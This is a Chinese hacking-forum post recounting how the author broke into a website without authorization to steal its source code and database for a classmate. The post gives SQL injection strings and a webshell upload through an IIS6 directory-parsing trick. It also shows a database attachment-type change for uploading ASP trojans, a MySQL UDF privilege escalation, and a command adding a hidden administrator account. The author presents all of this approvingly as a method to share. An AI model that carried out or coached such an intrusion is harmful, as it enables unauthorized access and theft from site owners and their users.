|
|
发表于 2010-1-21 12:21:01
|显示全部楼层
一日晚,同学丢来个网址说要源代码+数据,当时有时间就打开看了下,网站是.net脚本,也不知道是采用的什么整站系统可能是找人做的,就简单的在几个带参数连接页面提交单引号,并没有返回想要的东东,
用wwwscan扫描敏感目录,结果什么都没有扫描到,
然后用Acunetix Web Vulnerability Scanner 6扫描了下,没有什么可用的东东,扫描到一个bbs目录 ,打开看了下是Discuz!NT2.5的,用弱口令尝试登陆失败,记得这个版本之前暴过漏洞(showuser.aspx的ordertype参数未经过滤),不过我只成功过一次都是很久以前了。看了下会员数不少,估计这论坛打了补丁,决定绕道~,旁注开始了
用super injection超级旁注工具来旁注检测,服务器上十几个 站,
不像是虚拟主机 所以觉得有把握提权,首先载入查询站点后批量扫描数据库,有几个站存在备份的文件和数据库但是几百M,网速不够快就懒得 下载了
然后批量检测注入点,结果什么 也米有,
然后扫描批量后台和敏感目录,扫到一个网站后台a dmin,
asp脚本,
去掉admin来到网站根目录,发现还有带参数的php链接,于是再简单的进行注入测试,返回”连接超 时………”,
接连尝试了几个网站都没有扫描到后台目录
于是开始挨个检测,当打开其中一个站的时候,发现有个搜索文本框,搜索1’
根据页面返回信息貌似有注入漏洞,虽然米有找到后台,还是先找出管理员密码再说,说不定其 他地方有用。
我用winsockexpert工具抓包然后构造注入点用pangolin 射之但是提示米有检测到漏洞,看来还是来手工了,网站上面的搜索文本框限制了字符长度,于是将html网页保存到本地,将无用的代码去掉,把action提交的search.asp改成http://xxxx.yyy.com/search.asp,将文本框长度适当增加,再来接着搜索 1’and @@ve rsion=0—
提交后返回mssql 版本信息
再搜索1’and(select password from admin)>0--就直接爆出 了管理员md5密码,
一击就中,感觉不错。呵呵,
先在线查询之然后到前台找联系方式什么的混合起来尝试登陆ftp,还是失败
再用Acunetix Web Vulnerability Scanner 6扫描下,发现一个blog
目录,访问了下tags.asp很像oblog程序,于是硬盘里翻出去 年写的一个小工具暴破之,
还好人品不错,这个漏洞没有被修补,注射出来管理员又是hyl12 3456,然后进入后台
版本是oblog3.1,后台操作速度很慢,可能是会员比较多(仔细看那些用户名才知道是虚假的),
网上都是针对4.x版本的拿shell方法,所以在这里花了不少时间,因为网速比较慢再加上数据库比较大,简单说下拿webshell过程,首先点击数据库备份,然后目录处填 news.asp,
程序会自动创建一个news.asp的目录,因为iis6嘛,这个不用多啰嗦,然后再添加用户目录news.asp并设置为默认,到前台注册一个新用户,然后在默认模板里面进行文本编辑,加入一句话木马,然后随便发表篇日志,程序自动生成页面到 blog/news.asp/用户 名/xx/x/xx.html
看到 类型不匹配:”excute”了吗。。成功了也。。。终于迈开一大步了哈哈
立马 用 客户端连接,然后小马传大马
传了大马然后尝试跳到上级目录失败,其他网站目录拒绝访问,各个分区都无法访问,su 提权失败 预料之中~~~ 在c:\recycler上传cmd.exe并执行巴西烤肉提权 没有反应,上传了个.aspx木马,结果该目录不支持.net,php也不支持,然后在当前web目录里面找sqlserver连接账号密码,上传dbtools(一个asp脚本可以在线mssql管理工具),用找到的账号密码连接,尝试执行xp_dirtree扩展存储列目录然后备份 一句话木马到目标web目录,建立一个表,
create table temp(dir nvarchar(255),depth varchar(255),files varchar(255) ,ID int NOT NULL IDENTITY (1,1));--
然后将查询结果插入到表里面,
insert into temp(dir,depth,files) exec master.dbo.xp_dirtree 'c:',1,1--
再查看内容,发现内容是空 的,换了几个常用可读写目录都不行 。
再次写了段构造注入点的代码,
然后测试访问http://xxx.com/in.asp?id=1出现下 图所示的错误,可能id为1的记录 不存在
再看了下表里 面 原来id是2
加个单引号测试下效果
然后拿给pan golin注入检测,也不能列目录和其他操作,
用sql2000查询分析器连接上去 提示无法打开默认数据库,再换用SQL Server Management Studio Expr ess连接,选项里面设置数据库为本网站数据库名
成功连接上服务器数据库 ,新 建查询 执行了xp_dirtree还是没有反映,
这时看到还有其他数据库,还有目标网站数据库居然还有访问修改权限,(后来才知道有几个网站连接数据库是用的和当前网站数据库相同sql账号)再次证明运 气不错。哈哈。立即找到目标网站bbs的数据库。
找到管理员用户 和md5密码在线破解成功
登陆进目标网站bbs后台。
这下数据库加管理员账号拿webshell就简单多了
直接到数 据库里面打开attachtypes表添加asp格式文件,大小限制为2M
然后到前台发贴,结果还是不 能上传asp的,估计是缓存没有更新,于是后台更新了 下缓存
再次来到前台发帖,这下可以上传asp文件了。
于是上传了个大马,开始找地址
到前台 想点击我的附件,结果没有反应,于是到数据库里面去找找。打开dnt_att achments,对比下时间,最下面找到了附件相对路径,
从网上拿shell 的文章中得知上传目录为upload
于是在目标网站访问http://xx.com/bbs/upload/2009/x/x/x/x/xxx.asp,终于拿到目标站的webshell了
目标网站支持asp.net,于是上 传了个aspx木马
再来执行巴西烤肉还是失败。估计打了补丁.
管他呢,先打包源码再说,上传一个rar.exe(c:\program files\winrar\rar.exe)
执行如下命令
G:\new\rar.exe a -r -va E:\web\ourselves\sckjwcom090208\wwwroot\ads\code.rar E:\web\ourselves\sckjwcom090208\wwwroot\ads\
然后把地址丢给同学让他去下载了。还有数据库没有搞定,用SQL Server Management Studio Express备份失败,又提示无法打开默认数据库。不知道怎么回事,这sql2005真麻烦。sqlserver不太熟悉,郁闷 呵呵~
执行backupdatabase to disk ‘x:\wwwroot\xxx\wwwroot\xx.bak’提示,
'E:\web\ourselves\sckjwcom090208\wwwroot\ads\fuzepx.bak' 附近有语法错误。
(PsL提权后才弄明白原来备份语句少了一个等号)
接下来就想提权了,用aspx木马查看了下服务信息,
在d:\mousemail有邮件程序,然后进入到该程序目录,找到一个system.cfg,
看文件名得知这是个配置文件,打开看下有什么好东东,
果然发现了一个my sql账号密码,端口为3308,还root呢,呵呵,这下感觉离目标不远了。
于是在硬盘里找出mysql提权脚本工具udf.php,导出dll文件的时候又被杀了,可恶的symantec.记得杀虫剂给过我一个免杀的udf提权脚本,又不知道放哪去了,当时他也不在线,秒杀说他在线。我找他不理我bs ing~,忽然想起t00ls论坛里面有个帖子发布了6月16日过全部杀软的udf.php(http://t00ls.net/thread-2264-1-1.html) ,于是 download下来,上传至目标网站目录,发现支持php,离成功只差一步了呵呵,
成功导出并执行命令select mycmd("net user aspnet$ blackhumor /add & net localgroup administrators aspnet$ /ad")提示命令功能完成,
之前就探测了下 开了3389,而且外网可以直接连接
进去备份数据库打包到网站目录让同学下载。
任务总算是完成了 (感谢t00ls那个楼主,感谢党,感谢人民………感谢mtv),
结语:整个过程走了不少弯路,但总体还算是顺利。有点郁闷的是最后发现论坛存在注入漏洞,并没有修补,可以直接拿下的结果绕了个大圈~~不过还是长了点经验,发出来给大家分享下,由于专业知识欠缺,思路不是太清晰。很多认识不到位的地方还请牛牛们指点下。~ |
|
狗仔卡
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡
不